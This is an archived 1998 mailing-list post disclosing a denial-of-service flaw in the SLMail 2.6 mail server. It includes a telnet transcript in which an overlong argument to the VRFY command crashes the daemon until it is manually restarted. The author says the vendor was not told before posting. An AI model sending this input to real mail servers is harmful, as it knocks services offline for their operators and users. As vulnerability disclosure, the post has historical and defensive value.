SLMail 2.6 DoS

From: Steven (stevenat_private)
Date: Wed Mar 11 1998 - 17:44:56 PST

    Hello,

            I have recently found a quite serious DoS attack for the SLMail
    2.6 email daemon (www.seattlelabs.com/slmail). A long string of text
    after a command makes the program crash.  I have only tested this on
    2.6, so I'm not sure if other versions are vulnerable.

    craphole:~$ telnet www.victim.com 25
    Trying 555.55.555.55...
    Connected to www.victim.com.
    Escape character is '^]'.
    220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here
    vrfy
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    Connection closed by foreign host.

    craphole:~$ telnet www.victim.com 25
    Trying 555.55.555.55...
    craphole:~$

            It will stay unresponsive until manually restarted. I haven't
    mailed Seattle Labs about this, but I'm sure they'll figure it out.

    Later,

    Cisc0 @ Undernet
    stevenat_private